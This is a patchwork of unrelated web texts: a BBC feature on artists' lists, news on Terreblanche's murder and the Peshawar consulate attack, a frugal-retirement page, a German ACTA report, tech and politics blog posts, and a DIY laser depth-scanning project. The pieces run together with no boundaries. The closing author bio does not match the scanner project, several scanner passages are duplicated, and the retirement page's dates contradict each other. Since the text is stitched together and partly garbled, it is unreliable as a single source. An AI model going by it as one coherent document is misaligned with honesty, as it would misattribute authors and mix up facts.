A chaotic inventory of work by the colour theorist Oscar Bluemner that is almost illegible .
He committed suicide shortly afterwards .
A collection of attributes the Finnish architect Eero Saarinen found most attractive in his wife .
First on his list is the fact she was very clever .
A self - assessment chart by the sculptor and designer Harry Bertoia in which he rates his character traits .
As a struggling Italian immigrant he gives himself an " excellent " for health , neatness and accuracy , but scores poorly for quickness of thought and courage .
Obsessive list makers Washington - based psychoanalyst and expert on leadership Dr Michael Maccoby says list makers themselves fall into different categories : " The extreme is the obsessive who has to make lists of everything .
These are people who have an unconscious fear that everything is going to be out of control if they do n't make a list , " says Dr Maccoby .
Oscar Bluemner ( 1867-1938 ) appears to have fallen into this category .
Liza Kirwin says he was an adamant list maker , who even kept lists of lists .
You can see that there 's a lot of chaotic emotion involved , probably repressed anger
Dr Michael Maccoby , psychoanalyst
" But in trying to give order to his life , he obscures the clarity of the inventory of his work .
He 's completely obsessed with this type of record keeping , " she says .
The illustrated list of his landscape paintings is a condensed jumble of thumbnail sketches with overlapping notes on the right - hand side .
Comments in pencil are overlaid with separate remarks in ink and underlined in different colours .
" The colours are mostly reds .
Reds tend to show strong emotion and he 's taking his red pen and putting it through lines and taking things out .
You can see that there 's a lot of chaotic emotion involved , probably repressed anger , " explains Dr Maccoby .
But he says it would not have been possible to predict Bluemner 's suicidal impulses just by looking at his list .
His state of mind could only have been detected by comparing the list to other aspects of his behaviour and expression .
Most of the artists in the exhibition are from the Western Hemisphere which may highlight some cultural differences between list makers .
Dr Maccoby has studied European and Chinese business leaders and thinks a pre-occupation with detail is a broadly Western characteristic not shared by people in Asia .
Control " The Chinese try to understand the whole and how the parts serve the purpose of the whole project .
Once they have that concept , then they look at each part in turn .
Europeans immediately break everything down and stack up lists .
MRS SAARINEN'S ATTRIBUTES I .
First I recocnized that you were very clever
II .
That you were very handsome
III .
That you were perceptive
IV .
That you were enthusiastic
V. That you were generous
VI .
That you were beautiful " Then they try to resolve each one separately in an ideal way and hope that they all fit together in the future .
It 's really not as useful , " Dr Maccoby says .
Eero Saarinen 's list of his wife 's attributes could be seen as an example of this tendency - or it could be could be read as a love letter : " He 's deciding exactly what his wife 's qualities are , " Dr Maccoby says .
" He 's putting her in a frame .
It 's a form of psychic control and great architects are in a special group when it comes to the desire to control and create everything .
Dr Maccoby sees parallels between Saarinen and Frank Lloyd Wright , the American architect and designer of Fallingwater in Pennsylvania : " Look at Frank Lloyd Wright who not only wanted to design the building , but also all the furniture in the building and the wife 's clothes . "
Saarinen is perhaps best known for designing airport terminals in Washington and New York and the exhibition contains another of his lists .
Dated 16 August 1961 , it is a large but neatly itemised catalogue of things to do that range from changing light bulbs to presenting plans for a major design project in Oslo .
Some of the items have been crossed off , while others remain undone .
The following week he was diagnosed with a brain tumour , and a few days later he was dead .
It is a poignant reminder that none of us will ever complete all our lists .
Lists : To-dos , Illustrated Inventories , Collected Thoughts and Other Artists ' Enumerations from the Archives of American Art runs until September 2010 , at the Lawrence A Fleischman Gallery , part of the Smithsonian Institution in Washington DC .
Send us your comments using the form below .
Name
Your e-mail address
Town / city and country
Your comment
The BBC may edit your comments and not all emails will be published .
Your comments may be published on any BBC media worldwide .
Terms & Conditions
I am a compulsive list - maker .
Everyday I make one , especially now that I 'm writing a thesis and I have to keep track of what I need to read or what article or book I need to look for .
One day , after hearing that my advisor did not like what I wrote , I came back and left my " to do list " of that day untouched for a few days .
It made me so depressed to look at it everyday !
Now if I do n't finish what 's on the list , I simply throw it out and start a new one ; that way , I feel a lot more accomplished and hardworking .
I.N.D , Somewhere in New England , United States
When you 're 77 you have to make lists to remember what you wanted to do 15 minutes from now .
Bonny Levine , Venetia , PA USA
I make lists all the time , In fact As follows : Read BBC website Comment on BBC Website Search BBC website for my comments
Make tea Drink tea Read website Search for my comments type an email send an email twidlle thumbs look at clock go home repeat for 5 days Saturday - Sunday : Abandon list making until Monday 9am .
Etc .
Marj , Worthing , West Sussex
Let us not forget the greatest and most powerful computer language ever invented : LISP .
The name stands for List Processor , and basically that 's all it does .
For all that it was an early candidate for use in Artificial Intelligence .
David Jones , Rochester NY USA
I also am addicted to list keeping , tho it drives my family crazy to find all my scraps of lists laying around , but I could 'nt run my life without lists , it 's the only way I can keep track of what I 'm doing , needing , wanting , or where I 'm going , Kudos to Ms. O ' Brien !!
Ann Randolph , Apple Grove , WV U.S.A .
The importance of the humble shopping list should never be overstated .
Througout the week it serves as a place to make a note of things you run out of , and comes into its own when the shopping has to be done .
As someone on a budget I find the discipline of the list ( if it 's not on there you do n't buy it ) helps to prevent pointless purchasing and far outweighs the obvious problem of forgetting to buy something which has not been put on the list in error .
I always make my food shopping list in the order of the wherabouts of the items in the shop , which also saves time .
Kate , Oxford , UK I find the idea that Europeans have a different way of organising and ordering the world very interesting in light of the differences between Roman numerals and the Arabic numeric system .
Although the Roman I , II , III , IV , V , etc proceeds in a nice logical and visual way ( like a list ) , the system is impractical in terms of mathematics .
It was only with the introduction of the Arabic - derived number system of 1 , 2 , 3 , 4 , with each number more closely integrated with each other in a decimal system , that complex mathematics was able to develop .
Kevin Lewis , Poole Ironic that there is a list of lists within this article !
I shall resist the urge to list what I like about making lists ...
Louise , London , UK I absolutely love writing lists .
I find I can write a list , then forget to take the list with me but the act of writing a list has held the list in my head which is good enough for me .
I collect abandoned shopping lists too .
They make me laugh .
Kyleigh , Bournemouth , UK Very interesting !
I never realized it would reflect as a person 's subconscious desires or inner traits .
Before I go on a trip , I try to list down the things to take along , and of course , make the usual to - do list like most people , before going shopping .
Indeed , when will we ever complete or accomplish the things we have listed ?
Only fate knows ...
Thanks .
Pearl , Toronto , Canada I 'm an avid list maker and can get extremely obsessed with it .
Holidays are planned with military precision with list made of equiptment ( when out camping ) , clothes to take , other items required plus budgets ( I have a budget for everything ) !
Work list are re-written every 2 - 3 days so as to ensure that those crossed out do not obscure the items that are not crossed out .
Sad and wierd maybe but I 'm one of the most organised people I know !
Jennie F , Leeds , UK Making written lists does not prove one is a genius .
A genius should be able to make mental lists .
I never make written lists .
San Ying , Montreal Canada
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
CAPE TOWN , South Africa Ã¢â‚¬â€ South Africa ’s far - right leader Eugene Terreblanche who campaigned for a separate white homeland was murdered on Saturday on his farm , the SAPA news agency reported .
The 69 - year - old Afrikaans Resistance Movement leader was attacked and killed on his farm in the north - west after an alleged dispute with two workers , one a minor , over unpaid wages .
The two were arrested and charged with his murder .
ADVERTISEMENT
“ Mr Terreblanche ’s body was found on the bed with facial and head injuries , ” police spokesman Adele Myburgh was quoted as saying .
“ A 21 - year - old man and 15 - year - old boy were arrested and charged for his murder .
The two told the police that the argument ensued because they were not paid for the work they did on the farm , ” she said .
Terreblanche ’s white supremacist supporters , characterised by khaki uniforms and the organisation ’s swastika - like symbol , violently opposed the talks that led to South Africa ’s democracy .
Their campaign included bomb attacks ahead of the 1994 polls .
Terreblanche was released from prison in 2004 after having been jailed in 2001 for an attack on a black security guard .
Frugal Retirement Living which lifestyle will you choose ?
Welcome to the frugal retirement living home page .
This site will be of interest to :
People who are already retired and want to stay retired
and want to stay retired People who are retiring now of their own choosing or not
People who are considering retirement but think they cannot afford it now
but think they cannot afford it now People who would like to learn ways to save money , retired or not
Despite all the doom and gloom about being able to enjoy retirement , you are hearing this site can help everyone listed above ...
Retirement is the payoff for all your hard work , you have earned it and deserve it ... Read on and retire .
This site is devoted to folks who would rather retire than continue to work ...
I would think that would include most everyone .
This is not advice that you will get from a financial planner .
This site does not tell you how to make more money , but rather how to spend less and enjoy yourselves more ...
Let 's get started ... but first take a look at the left column of the page ... the couple on the stern of a sailboat ... you too can as happy as they look ... I know ... it's a picture of yours truly and his soulmate since 1975 .
A message from the editor of Frugal Retirement Living
I am currently 74 and we had been retired for 26 years , we would not trade our retirement years and experiences for any amount of money ...
We learned long ago the futility of swapping time working for dollars ... it is not worth it folks .
Take another look at the couple on the stern of their sailboat Shadowtime ... somewhere in the Caribbean ...
And tell me they miss the office .
Do not give up on retirement
It is 2020 , and some folks wanting to retire just think they cannot retire ... we are here to help you realize you can if you choose low cost ways of living .
As I write this I am truly amazed that the information contained within , is as pertinent today as it was when the site was first started in 2009 ... 12 years later , the 350 pages on this site are still relevant in 2020 .
We are not hippies , daredevils or anyone out of the ordinary ...
We would rather be retired on less than working to acquire more retirement dollars .
We will show you why you should retire as soon as possible ... or we will at least make you think twice .
One of the saddest things that I hear is ... that I cannot afford to retire .
You should not say that until you have investigated all lifestyles that cost less to enjoy .
We can introduce you to the frugal retirement living lifestyles that we have enjoyed , you will discover that they are painless , safe , practical and frugal .
Have you considered these frugal lifestyles ?
None of these options are cheap living , they are just living cheaply ...
There is a big difference between the two phrases ... one involves sacrifice the other embraces retirement .
Not ready to retire ?
If you would just like to learn methods on how to save money , you have come to the right site .
We have dozens of real life practical methods to save whether you are ready to retire now or later .
With 26 years of frugal retirement living experience you do not have to learn by trial and error you can get your answers here .
Come inside and let us tell you how we have enjoyed and continue to enjoy our retirement years .
Der kanadische Jurist Michael Geist hat anlässlich einer Anhörung der Liberalen ( ALDE ) am heutigen Dienstag im Europaparlament der Behauptung widersprochen , das geplante Anti-Counterfeiting Trade Agreement ( ACTA ) bringe keine Veränderungen für die nationalen Gesetze der Verhandlungspartner .
Kanada werde beispielsweise regelrecht in die Zange genommen und zu Anpassungen seiner Urheberrechtsgesetze an US - und EU - Standards gedrängt , und zwar durch die ACTA - Verhandlungen und durch Verhandlungen um ein Europäisch - kanadisches Freihandelsabkommen .
Auch den EU - Mitgliedsstaaten werde das hinter verschlossenen
Türen verhandelte ACTA Gesetzesänderungen abverlangen , warnte Geist in einer Pressekonferenz .
Der Kanadier , der an der Universität von Ottawa lehrt und derzeit als Hauptkronzeuge gegen ACTA gefragt ist , erläuterte , dass nicht alle ACTA - Verhandlungspartner Internetzugangssperren im Stil des französischen Three - Strikes - Konzepts installiert hätten .
Gerade in der EU hätten sich viele Mitgliedsstaaten bislang gegen solche Sperren ausgesprochen ; so auch heute wieder die Bundesjustizministerin Sabine Leutheusser - Schnarrenberger in einem Radio - Interview .
In einer von Geist veröffentlichten Expertise stehen die Zugangssperren allerdings aktuell als einziger Vorschlag dafür , wie Internet - Provider ( ISP ) vermeiden können , von Rechteinhabern für die Urheberrechtsverfehlungen ihrer Kunden verantwortlich gemacht zu werden .
In ein paar Jahren könnten nationale Gesetzgeber darauf verweisen , dass sie sich durch ACTA verpflichtet hätten , solche Maßnahmen vorzusehen , befürchtet Geist .
Geists Bedenken teilen anscheinend Vertreter der ALDE - Fraktion , die für heute Nachmittag Experten zu einer Anhörung über ACTA geladen haben .
Der Liberale Alexander Alvaro warnte , dass selbst Deep Packet Inspection als eine Form der Datenverkehrsüberwachung langfristig durch ACTA hoffähig gemacht werden könnte .
ISPs wüssten dann über alle Aktivitäten ihrer Nutzer Bescheid .
Alvaro widersprach der Auffassung , dass die gebeutelte Zeitungs - und Zeitschriftenbranche durch ACTA gerettet werden könne .
Auch diese würde letztlich leiden , wenn der freie Informationsfluss im Netz behindert würde , warnte Alvaros Kollegin Marietje Schaake .
Die Hauptsorge der Liberalen betreffe das Internetkapitel in ACTA , dessen Existenz anfangs sogar teils geleugnet wurde .
Für die beiden Parlamentarier ist für ein Gelingen von ACTA unabdingbar , dass das EU - Parlament früher einbezogen wird und die ACTA - Verhandlungen insgesamt transparenter geführt werden .
Alvaro sei nicht grundsätzlich gegen den Abschluss eines ACTA - Abkommens ; allerdings werde er gegen das Abkommen stimmen , wenn die vom EU - Parlament in einer Entschließung erhobenen Anforderungen nicht erfüllt würden .
Das Parlament hatte in einer Resolution gefordert , das ACTA im Kern auf gefälschte Produkte zu beschränken .
Diese Forderung , um es die laut Beobachtern ein erhebliches Tauziehen gegeben hatte , würde das gesamte Internetkapitel in Frage stellen .
Damit würde ACTA in der Tat im Kern in Frage gestellt , glaubt man dem Experten Geist .
Die Ironie der ACTA - Verhandlungen liege letztlich gerade darin , dass das Abkommen erst einmal wenig Verbesserungen im Kampf gegen Produktfälschungen – etwa gefährliche Medikamente – bringe .
Insbesondere der von Geist als " Country - Club - Ansatz " bezeichnete Weg , also die auf wenige Staaten beschränkten , exklusiven Verhandlungen , ist nach seiner Ansicht ein Problem , da Länder wie China , Herkunftsland zahlreicher gefälschter Produkte , außen vor blieben .
Siehe dazu auch :
( anw )
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
At least seven people have died after militants attacked the US consulate in the north - western Pakistani city of Peshawar .
There were several explosions in the area near the consulate and buildings collapsed .
A gun battle between police and the attackers followed .
Pakistan 's main Taliban faction said it had carried out the raid .
The raid came hours after 43 people died in a suicide attack about 80 km ( 50 miles ) north - east of Peshawar .
The bomber targeted a crowded rally held by a Pashtun nationalist party in Timergara , Lower Dir. ' Great concern '
Investigators suspect it was co-ordinated with the Peshawar attack , in which police told the BBC four militants and three security personnel died .
Americans are our enemies - we plan more attacks
Azam Tariq
Taliban spokesman
In pictures : Peshawar attacks ' Suicide bomb ' at Pakistan rally Who are the Taliban ?
There were no reported US casualties and it is not clear if the US consulate building suffered any damage .
The White House condemned the attack and expressed " great concern " .
The militants struck close to Shama Square , a major crossroads at the northern end of Peshawar 's cantonment area , near the US consulate .
There are also some army barracks and offices of the army 's military intelligence close by .
Vehicles ablaze
An Associated Press reporter at the scene said two of the explosions were just 20 m from the consulate , which is in a heavily fortified area .
Please turn on JavaScript .
Media requires JavaScript to play .
Pakistani police officer Ghulam Hussain told AFP news agency : " One of the suicide bombers blew himself up close to the gate .
Police guarding the US consulate started retaliatory fire .
" More blasts took place .
We have recovered unexploded material from four different points . "
Taliban spokesman Azam Tariq said his group had carried out the raid .
" Americans are our enemies .
We carried out the attack on their consulate in Peshawar .
We plan more such attacks , " he told Reuters news agency .
ANALYSIS M Ilyas Khan , BBC News , Islamabad
Monday 's attack in Peshawar appears to be similar to recent gun-and - bomb raids in Lahore and Rawalpindi .
These have been co-ordinated assaults , with several gunmen moving in alongside suicide bombers to force their way into a facility - this time the " prized " US consulate .
The Pakistani Taliban were apparently aiming for a feat to match the one last December in Khost , Afghanistan , in which several American CIA officials were killed .
Another reason could be to try to ease military pressure on militants in Orakzai tribal district , where the Pakistani security forces launched a major operation last week .
America 's presence in Afghanistan and US drone strikes on militant targets in Pakistan 's tribal areas make the US a top target for the Taliban .
TV footage showed army soldiers taking battle positions on the main Khyber Road where the blasts took place .
Witnesses told BBC Urdu a couple of armoured vehicles parked outside the consulate caught fire .
" I saw attackers in two vehicles .
Some of them carried rocket - propelled grenades , " said Peshawar resident Siraj Afridi .
The BBC's Shoaib Hasan in Islamabad says this is the first attack against a US facility in Pakistan in four years .
In 2006 , a US diplomat was killed by a suicide car bomber near the US consulate in Karachi , days before a visit to Pakistan by then US President George W Bush .
As well as endless political bickering , nuclear - armed Pakistan is plagued by an Islamist insurgency that has killed many hundreds of people in recent years .
In a move which could help ease decision - making , President Asif Ali Zardari urged MPs on Monday to back reforms that will see him relinquish his sweeping powers .
Zardari applauded Constitutional amendments , long demanded by the opposition , are expected to pass this week , making him more of a titular head of state , while empowering the prime minister and parliament .
ATTACKS ON US TARGETS Feb 2010 : Three US military trainers die in bomb near Lower Dir school Aug 2008 : Top US diplomat evades Peshawar gun attack Mar 2006 : Suicide bomb kills US diplomat near same consulate Feb 2003 : Gunmen kill two policemen outside same consulate June 2002 : 12 Pakistanis die in bomb at Karachi US consulate
In an annual address to MPs , Mr Zardari was cheered as he vowed to defeat the insurgents .
" We are prepared to risk our lives , but we are not prepared to surrender this great nation to the militants , " he said .
Peshawar , which is on the edge of Pakistan 's tribal areas , has been frequently targeted by Islamist militants .
Analysts said Monday 's attacks appeared to be in response to a major security operation launched last week in the Orakzai tribal region near Peshawar .
We asked for your reaction to this story .
Please find a selection of your comments below .
The Khyber Road was closed for public transport two hours before the explosion took place as I was coming back to home from Peshawar University , so it seems that Pakistan intelligence knew about the attack .
Hamid , Peshawar I am visiting Peshawar on business and was about 1 km away from the blast .
The chaos and destruction here was indescribable .
The only thoughts in most educated people 's minds are : ' Why does the world not recognise that all these Taliban type attacks are fuelled by Saudi - type Wahabbi line of thinking ? '.
Until the West recognises Saudi Arabia and its radical type of Islam as the source of ' Islamic terrorism ' , the world will never be at peace .
Arif-ul Haque , Islamabad
The US Consulate has been stationed in Peshawar for the last 30 Years , but common Peshawar people still had to travel 180 km to Islamabad to get a Visa .
The world should understand that we the Pashtun of Peshawar and NWFP province are fighting against terror and cleaning up the supposed enemies of America which the USA created to fight the Russians in 1979 .
We are victims of double prejudice as we are considered as friends of the same terrorists who are killing us , although the local population have taken arms against the Taliban in NWFP and FATA to fight them voluntarily .
This prejudice was the reason this consulate was closed to offering us local Pashtun people visas and travel rights to the USA .
Khurrum , Peshawar
The US has to decrease its presence in Pakistan which is causing civilian lives to be lost .
The consulates should be moved outside the city because they have blocked the main entrance to the city , forcing people to have to take the long route .
Zubair Afridi , Peshawar I wish all these coward fanatics could be eliminated in one go .
Peshawar is a beautiful place with a proud and welcoming people - unfortunately destroyed by these idiots who have nothing to do with the religion of Islam .
These people are brain - washed for political and personal gains .
Ayaz Khan , Peshawar , Pakistan
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Updated Update :
This story has been updated to show that although Virgin American is not using Flash on its home page , it is using Flash elsewhere on its site
As Silicon Valley titans Apple and Adobe System deck it out over the weakness of Flash , one Valley - based outfit has put Adobe 's Flash in its place - and that place is n't necessarily online
Start - up airline Virgin America has decided HTML is " good enough " for animating online content on the home page of its brand - new website , which went live Monday , dumping Flash
It 's a move that does more than just show what happens to customers when there 's a clash of tech - industry egos .
It illustrates the options customers have between picking the closed Flash - or Silverlight from Microsoft - and open technologies such as HTML to serve content to a new generation of mobile computing devices .
Simhambhatla : iPhone , and other mobile , users welcome
Virgin picked HTML to give users of iPhones and other mobiles the option in the future of checking in through their phone .
The battle between Adobe and Apple has seen Flash deliberately excluded from the Jesus Phone .
Chief information officer ( CTO ) Ravi Simhambhatla told The Reg : " I do n't want to cater to one hardware or one software platform one way to another , and Flash eliminates iPhone users .
This year is going to be the year of the mobile [ for Virgin ] . "
Simhambhatla hopes to let passengers check in with their phone at places like San Francisco International Airport during the second - half of the year .
Virgin will issue an electronic boarding pass that you 'll show security workers on your phone 's screen .
The only thing holding this up is approval by the Transportation Security Administration that runs security at airports in the US .
Virgin - based down the road from Apple and Adobe in Burlingame , California - picked HTML for a site that brings in more than 70 per cent of the airline 's $ 100 m in quarterly revenue .
It 's turned to HTML for a site it calls its " crown jewels " to give potential passengers a smooth online experience , with sliding animations and fancy Web - 2.0 - drop - down menus .
The existing site was less than three years old .
Virgin anticipates moving this new site to HTML 5 , once it 's cleared standards ratification at the World Wide Web Consortium ( W3C )
A herd of dairy cows from the University of Waterloo might be the first of the bovine species to use Twitter .
The cows brag about milk production , RFID transponder glitches , eating habits , technical issues with the " Mr. Terminator " milking machines and the specific nuances of which teats perform best .
Some of the cattle even let loose with an occasional literary quotation from Virgil .
We 're hoping for Twitpics soon .
The tweets are actually a project from the University 's Critical Media Lab ( as whimsical as we like to be at Mashable , we know cows lack the necessary opposable thumbs for tweeting ) .
Lab members Ron Broglio , Marcel O'Gorman and Pouya Emami have teamed up with dairy farmer Chris Vandenberg and a dozen of his favorite milk cows on Buttermine Farms in Brant , Ontario .
The data for the tweets comes from a modern , computer - operated and cow - initiated milking system .
The team explained :
Each cow wears a RFID tag that is used to coordinate her activities with a central computer .
As a cow approaches the robotic milking pen , the computer reads the tag and determines whether or not the cow is scheduled to be milked , based on her stage of lactation and average daily output .
If the cow is ready for milking , she is allowed into the pen .
Once inside , a robotic arm washes her teats , latches on , and extracts the milk while the cow eats high - grade feed to make her happy .
The milk output and feed input is recorded by the main computer and stored in a database , along with the total milking time , time / teat , and total time in pen .
Fascinating , is n't it ?
The cows basically milk themselves , and the amount of information this system generates is enough to power a Twitter - based stream of data on milk production and dairy farm life .
If you 'd like to take a closer look at the project in action , check out this Twitter list of the 12 dairy cows on Twitter .
I feel that I should close this post with a cow - related pun , but I 'd rather simply say that I think this is a pretty sweet idea and wonder what other kinds of fascinating data could be auto - tweeted with a " human " voice .
This is a very interesting turn of events .
Bob Corker was looking for Chris Dodd .
When the Tennessee Republican got him on the phone , he started to get the feeling that financial regulatory reform talks were collapsing after weeks of negotiations .
" You 've been a great partner , " Dodd , the chairman of the Senate Banking Committee , told Corker , who had been taking a lead role in the talks .
" My little antennae went up , " said Corker in response to Dodd 's use of the past tense to describe their partnership .
On Wednesday afternoon , the pair met privately and Dodd broke the news :
He was moving forward with his party on reform , cutting short negotiations with Corker that have been dragging on for roughly a month .
Dodd ( D - Conn . ) announced on Thursday morning that he will unveil a bill on Monday without GOP support and he intends to bring it to a vote the following week .
And I believe the pressure we 've been putting on Dodd not to fold the CFPA into the FED is one of the major reasons he broke off with Corker .
Corker said that the second pressure point for Dodd was that " members on the left were getting nervous " about where the Consumer Financial Protection Agency would be located .
Progressive Democrats have been particularly vocal in their opposition to placing the CFPA inside the Federal Reserve and Dodd was beginning to wonder if he had enough Democratic votes , he said .
The same Democrats are also concerned that the CFPA will lack sufficient independence and authority .
But , said Corker , Dodd had accepted a GOP proposal to create a board of regulators with veto power over any rules passed by the CFPA .
The panel would include the SEC , FDIC , Fed , Treasury and CFTC .
It looks like Queen Snowe will step in and help in the end .
Democrats , however , do not need Corker to pass the bill .
Earlier this week , Sen. Olympia Snowe ( R - Maine ) told HuffPost that once the bill was out of committee she looked forward to playing a central role in negotiations .
She already joined Sens. Maria Cantwell ( D - Wash . ) and Dianne Feinstein ( D - Calif. ) in sending a letter to Dodd , calling for tough regulation of derivatives .
Dodd 's decision to move forward without Republican support in the committee opens the door for Snowe , who 's more moderate than Corker and Shelby , to step in .
Corker will probably go on all the shows and do a bipartisan whine for the Villagers to embrace .
You know republicans are only watering down the bill as much as possible .
Republicans wanted banking regulators to take the lead in enforcing consumer rules , but Democrats argued that such a system would water down consumer protections
.
Americans unequivocally want strong Wall Street regulations .
An overwhelming majority of Americans wants Wall Street subjected to tougher regulation in the aftermath of the bank bailout and the bonus scandals that have rocked the U.S. financial sector , according to a Harris poll released on Thursday .
The findings suggest that 82 percent of Americans want the government to clamp down more strongly on Wall Street excesses , with a particular emphasis on bonus schemes that have rewarded employees at loss - making companies such as American International Group .
John Harwood said on CNBC that Democrats want to get this done sooner than later and that 's why they moved in this direction .
Simple , reliable 2.5D photography
Note :
You may also enjoy the Geiger - Mueller mood lamp project .
1. Intro and project goals
Alas , 3D scene reconstruction from series of freehand images is still an extremely hard problem in computing ; while promising results in controlled settings are presented every now and then , the output is very far from being even vaguely acceptable for general - purpose photography : missing or incorrect data , stitching errors , low voxel / polygon accuracy , and severe texturing issues , seem to be nearly impossible to fully work around with today 's technology .
Virtually all usable 3D scans of real world objects are accomplished through different means : using fairly simple triangulating 3D laser scanners to capture a 3D model by observing how an off - axis laser beam " flows " around the analyzed shape , and then - optionally - projecting textures generated from aligned 2D images .
This sort of full 3D acquisition is cumbersome and time - consuming enough to be out of question for casual applications , however .
As a CS buff , I am deeply impressed by the 3D scene reconstruction research ; but as a long - time photographer , I could n't help but wonder if major advances in photo processing could be made with much simpler tools .
In particular , I was intrigued by 2.5D imaging ( to borrow the term from the world of CNC machining ) : regular 2D pictures augmented with precise , per-pixel distance information , but no data about undercuts , backfaces , and so forth .
This data alone would enable you to take a photo with a relatively small aperture , and then :
Automatically split objects into layers : accurate distance and distance continuity information could be used to very accurately isolate elements of the composition , and allow them to be selectively edited or even replaced - eliminating one of the most difficult and time - consuming steps in photo processing today .
: accurate distance and distance continuity information could be used to very accurately isolate elements of the composition , and allow them to be selectively edited or even replaced - eliminating one of the most difficult and time - consuming steps in photo processing today .
Set focus and compute bokeh on software level : since per-pixel distance information is available , it is possible to apply ( and then tweak ) selective , highly realistic blur as a function of distance , to achieve the desired aesthetic effect after all the retouching and composition changes are done .
Creative bokeh effects would be also easy to achieve .
( A comparable goal is also being pursued with specialized sensor and aperture designs . )
: since per-pixel distance information is available , it is possible to apply ( and then tweak ) selective , highly realistic blur as a function of distance , to achieve the desired aesthetic effect all the retouching and composition changes are done .
Creative bokeh effects would be also easy to achieve .
Apply volumetric effects : a number of other depth - based 2.5D filters could be conceivably created , most notably including advanced , dimensional lighting and fog .
: a number of other depth - based 2.5D filters could be conceivably created , most notably including advanced , dimensional lighting and fog .
Still use existing 2D software : since all mainstream 2D photo manipulation programs feature extensive support for layers and grayscale masks , their existing features could be easily leveraged to intuitively work with 2.5D photography , without the need to develop proprietary editing frameworks .
There are several ways to create 2.5D depth maps , and I toyed , for example , with the concept of varying focal length and then measuring pixel contrast in function of this setting ( bad news : it yields vaguely usable distance information for well - defined edges only , and is horribly noisy everywhere else ) .
Another approach is simply to dumb down a 3D scanner : attach a pattern - projecting diode laser module to a servo , and install it on camera 's hot shoe .
The laser could then rapidly sweep the scene - and by the virtue of being slightly off the optical axis , distance information could be easily triangulated by measuring pattern displacement .
To explain a bit better , consider this simple case :
Naturally , sweeping the scene with a single dot would be painful - hundreds of thousands of readings would need to be taken to collect data with reasonable resolution ; sweeping the target with a horizontal line provides non-ambiguous data for an entire row of pixels instead .
It is worth noting that this principle could be taken even further - several projects resorted to projecting series of lines for 3D imaging purposes ( also known as structured light scanning ) - but this approach creates ambiguities in non-contiguous regions , and these are very difficult to reliably resolve in software .
When I first thought of building such a device in 2005 ( and experimented a bit ) , the biggest problem would be that a very significant number of stills would still need to be taken to achieve a reasonable vertical resolution , taking several minutes - and several hundred shutter cycles - per every photo .
Lowering Y resolution would be possible with simple , well - defined subjects - but all in all , this still seemed problematic .
Using a video camera for high fps acquisition seemed like a possibility - but individual frames from a reasonably priced digicam were simply unusable for any type of photo work due to limited resolution .
Thankfully , in recent years , we witnessed the arrival of digital SLR cameras with unprecedented video capture capabilities , producing pixel - perfect captures at 30 fps without interlacing , minimal compression artifacts , acceptable resolutions , amazing low - light performance , and full manual controls .
With Canon EOS 5D Mark II in hand , I decided to give the project another try .
2. Scanner design
WARNING : point beams from lasers over about 10 mW can cause eye damage or ruin camera sensors ; and starting around 100 mW , they can also set many things on fire .
Line - generating optics greatly decrease power per surface area , so they are n't nearly as risky as long as they are attached securely - but still , exercise caution .
NOTE : Following various minor but well - published incidents during sporting events or riots , several countries - most notably Australia - rolled out knee - jerk regulations banning the sale of virtually all useful lasers to general public .
These regulations are generally poorly enforced , especially for Internet purchases - but it is still your responsibility to stay compliant .
The optics should be picked to match the angle of view of your lens : a line around 100° is best for wide - angle ( 16 - 35 mm or so ) , 50° for standard portrait lens ( 50 - 105 mm ) , and under 20° for telephoto ( 135 mm and beyond ) .
Nothing bad will happen if the line is much wider than the frame , to be sure - other than the need for a more powerful laser to achieve the same level of illumination .
With the right laser in hand , you need to find a suitable power supply , and mount it on a high ratio geared motor ( or a really slow servo ) , so that it can smoothly sweep the entire scene - covering both a distant object near the top of the frame , and the closest you plan to photograph near the bottom .
The RPM needs to be selected to provide a sufficient resolution : around 150-300 discrete readings in the Y axis are probably optimal , and at 30 fps , this means about 5 - 10 seconds of screen time .
For wide angle , about 0.5 - 1.5 RPM is needed ; for normal portrait lens , 0.25 - 0.5 RPM may be more suitable ; and for telephoto , plan for 0.15 - 0.2 RPM .
Note that you can't simply grab a nominally faster , low - cost servo , and pulse it to achieve lower RPM : most of them have a very limited angular resolution , and can't be positioned accurately enough .
You can build a simple transmission to lower the RPM , though , or lower the driving voltage a bit .
In any case , the key to success is smooth , seamless rotation of the laser .
If you are not using a servo , you should also equip the motor with a home position sensor - a microswitch or an optointerrupter - to be able to start from a known location .
The whole setup needs to be hooked up to your computer or an autonomous microcontroller ( possibly through a H - bridge driver and a power Darlington to turn the laser on and off ) , and programmed to exeute the following algorithm :
If the limiting switch is currently closed , go to 3 .
Rotate up until the switch is triggered .
Abort if position not reached in expected time .
Momentarily reverse the motor to avoid cramming the switch too hard .
Wait for keypress .
Turn on laser .
Rotate down for predefined time needed to sweep the scene .
Abort if the limiting switch not depressed in time .
Optionally : make a short stop in the middle to key in reference reading .
Turn off laser .
Go to 1 .
The operator needs to follow this procedure :
Set up camera on a tripod , power up the scanner .
Capture the actual image to be augmented with depth information .
Adjust exposure to a predefined level suitable for capturing the projected line ( overexposure reduces accuracy , underxposure limits scan range ) .
Start recording video , capturing at least one reference frame with no laser beam present .
Press the button to start scan .
Stop recording once the laser shuts off .
The following photos document the mechanical design of my scanner ( see my CNC maching guide for a better explanation of what 's going on ) .
1 ) Low - level CAD work to design a 2500:1 gearbox for the laser :
2 ) A rendered CAD model of the entire gearbox assembly :
3 ) Positive molds for the assembly being machined on a CNC mill in RenShape 460 :
4 ) Finished positive mold :
5 ) Negative molds cast in hard platinum cure silicone ( ShinEtsu KE1310ST ) :
6 ) Final plastic parts cast in silicone molds using Innovative Polymers IE - 3075 :
7 ) Assembled gearbox , laser with line - generating optics visible :
8 ) Another take of the finished device :
3. Depth map software
Subtract the reference frame .
Extract color channel matching laser wavelength .
For each column : Normalize brightness .
Find beam start and end location .
Reject column if values abnormal .
Triangulate distance of start and end locations based on focal length , approximated laser angle at this time code .
If necessary , interpolate between data points ( snapping to detected edges when interpolating non-contiguous regions ) .
Create layers by isolating non-continuos regions in the depth map .
My initial tests , however , settled for something far more primitive - simply locating the frame for which pixel value is the highest , and correlating this with scanner angular position to compute unfiltered distance data .
Still , the first scan is n't exactly horrible .
Here 's a reference " daylight " capture of the test scene ( including a somewhat challenging , reflective marble surface ) :
And here 's the raw , unedited 2.5D scan data :
4. Questions , comments ...
About The Author Kat Neville is a freelance Canadian web designer ( living in the UK ) who is constantly coming up with too many ideas for new websites .
